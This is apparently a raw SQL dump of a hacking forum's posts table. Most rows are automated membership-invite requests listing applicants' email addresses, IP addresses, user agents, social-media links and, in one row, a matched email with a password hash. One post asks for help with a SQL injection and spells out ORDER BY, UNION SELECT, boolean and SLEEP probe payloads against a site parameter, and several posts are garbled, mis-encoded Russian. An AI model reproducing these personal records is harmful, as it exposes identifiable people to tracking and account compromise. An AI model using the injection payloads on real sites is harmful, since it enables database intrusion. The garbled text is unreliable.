Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.odnoklassniki.ru/profile/549654266711 | http://www.odnoklassniki.ru/profile/549654266711 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1720, 1536, 0, 'Invite', 2, '{$name}', 1408524427, '[SIZE=\'4\'][COLOR=\'Sienna\']Nick123[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: mail@mai.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://nick123.1nsk.ru | nick123.1nsk.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1721, 1537, 0, 'Invite', 2, '{$name}', 1408531215, '[SIZE=\'4\'][COLOR=\'Sienna\']Maza2000[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 7370377\n[b]e-mail[/b]: ppp97@inbox.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.40.44.161\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://maza2000.muzy.com | maza2000.muzy.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1722, 1063, 1072, 'Psych0tr1a', 11, '', 1408533325, 'ÿþûучøтÑÂѠøýúûуôøть xss ø sqli тþûьúþ ò тþü ÑÂûучðõ õÑÂûø ÑÂтþ rfi//\nтþûьúþ òþт úþüу ýуöýþ ñуôõт øýúûуôøть тðú?))', 1, 0, '', 0, 1, 0, 0, 0),
(1724, 1538, 0, 'lumbricus', 39, 'SQL - Injection HELP', 1408535071, 'Hello Comrades,\r\n\r\nI am really stuck, and I appreciate any advice/help. \r\n\r\nzambucca=12\' (Custom ERROR)\r\n\r\nzambucca=12 order by 1--+- (Custom ERROR)\r\n\r\nzambucca=12/**/order/**/by/**/1# (NO ERROR)\r\n\r\nzambucca=12/**/order/**/by/**/5# (Query has 5 columns total)\r\n\r\nzambucca=-12/**/union/**/all/**/select/**/1,2,3,4,5# (Boolean Valid Page No error - union seems not possible ( NO REFLECTION )!? )\r\n\r\nzambucca=12/**/AND/**/2=2# (TRUE)\r\n\r\nzambucca=12/**/AND/**/2a=2a# (ERROR)\r\n\r\nSo it seems as if it does not like the STRING VALUE only INTEGER\r\n\r\nzambucca=12 AND SLEEP(5) (Sleep too long not reliable)\r\n\r\nIs there anything I can do?', 1, 0, '', 0, 1, 0, 0, 0),
(1725, 1539, 0, 'Invite', 2, '{$name}', 1408537312, '[SIZE=\'4\'][COLOR=\'Sienna\']M-A[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w-98@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.28.125.111\n[*][b]real ip[/b]: 197.28.125.111\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1726, 1540, 0, 'ropertus', 33, '[close]', 1408547249, 'Got them what they were looking for.\r\n\r\nDelete thread please.', 1, 1, '', 4, 1, 0, 0, 0),
(1743, 1552, 0, 'Invite', 2, '{$name}', 1408666908, '[SIZE=\'4\'][COLOR=\'Sienna\']pirate[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: piratediablo@xampp.jp\n[b]e-mail[/b]: pirate@superrito.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 190.118.211.91\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/piratestationinferno | http://vk.com/piratestationinferno \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1727, 1541, 0, 'Invite', 2, '{$name}', 1408553209, '[SIZE=\'4\'][COLOR=\'Sienna\']tester_mine[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1102931\n[b]e-mail[/b]: asjsjjsa@aaa.aa\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/wall-68044219_7626?reply=7733 | http://vk.com/wall-68044219_7626?reply=7733 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1729, 1096, 1155, 'w0rm', 1, '', 1408556494, 'mod_kz : Suse2012', 1, 0, '', 0, 1, 0, 0, 0),
(1730, 1542, 0, 'Invite', 2, '{$name}', 1408560598, '[SIZE=\'4\'][COLOR=\'Sienna\']vinith[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ethical hacker\n[b]e-mail[/b]: hazare.vinith@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 183.82.233.196\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vinith.net | vinith.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1732, 1543, 0, 'Invite', 2, '{$name}', 1408604486, '[SIZE=\'4\'][COLOR=\'Sienna\']darty[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 671410590\n[b]e-mail[/b]: cultive94@hotmail.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 176.180.105.248\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://darty.it | darty.it \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1733, 1544, 0, 'Invite', 2, '{$name}', 1408604678, '[SIZE=\'4\'][COLOR=\'Sienna\']darty[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 671410590\n[b]e-mail[/b]: cultive94@hotmail.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 176.180.105.248\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://darty.it | darty.it \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1734, 1545, 0, 'Invite', 2, '{$name}', 1408611665, '[SIZE=\'4\'][COLOR=\'Sienna\']c000z[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: d-d@exploit.im\n[b]e-mail[/b]: lockwood.selena@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.221.162.226\n[*][b]real ip[/b]: 37.221.162.226\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ink361.com/app/users/ig-35143416/.../photos | http://ink361.com/app/users/ig-35143416/.../photos \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1735, 1546, 0, 'Invite', 2, '{$name}', 1408612146, '[SIZE=\'4\'][COLOR=\'Sienna\']donlee[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 111222\n[b]e-mail[/b]: leedon20@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 86.142.83.68\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Donleebaby | https://twitter.com/Donleebaby \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1736, 1547, 0, 'Invite', 2, '{$name}', 1408613470, '[SIZE=\'4\'][COLOR=\'Sienna\']anggeraw[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: skynet.netsky@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 180.214.233.36\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://anggeraw.deviantart.com | anggeraw.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1738, 1548, 0, 'Invite', 2, '{$name}', 1408623446, '[SIZE=\'4\'][COLOR=\'Sienna\']s1ckness[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 6548421354\n[b]e-mail[/b]: Lulzsec@Mail2tor.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.111.127.24\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://s1ckness.tumblr.com | s1ckness.tumblr.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1739, 1549, 0, 'Invite', 2, '{$name}', 1408627221, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr_AnarShi-T[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w-98@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.28.96.190\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://thehackersmedia.blogspot.com/.../googleps-hacked-by-cold-z3ro-hackteach.html | http://thehackersmedia.blogspot.com/.../googleps-hacked-by-cold-z3ro-hackteach.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1740, 1083, 1707, 'BigBear', 34, '', 1408630045, '[quote=kx00;1707]ÿрøòõт ñøр рðô чтþ ты Ѡýðüø. \r\nòþÿрþÑÂ. úтþ ýøть ÿþхõúðû [url]http://toranoana.jp?[/url][/quote]\r\n\r\nÿрøòõт. Ѡõóþ ø÷учðû. ôðûьшõ чøтðûúø ýõ ушёÃ».', 1, 0, '', 0, 1, 0, 0, 0),
(1741, 1550, 0, 'Invite', 2, '{$name}', 1408630707, '[SIZE=\'4\'][COLOR=\'Sienna\']balooba[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: r0c@hotmail.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.108.192.244\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://balooba.be | balooba.be \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1742, 1551, 0, 'Invite', 2, '{$name}', 1408633599, '[SIZE=\'4\'][COLOR=\'Sienna\']Gladiator[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: nima.nikjoo@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.232.213\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : gladiator : hacking_gladiator@yahoo.com : : dd02dcdcddd41eb7d0bb3162005df705\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/gladiator_mmdm | http://vk.com/gladiator_mmdm \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1744, 1553, 0, 'Invite', 2, '{$name}', 1408682381, '[SIZE=\'4\'][COLOR=\'Sienna\']w0rmm[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: net.wer.ksal.es@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 67.11.244.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://w0rmm.deviantart.com | w0rmm.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
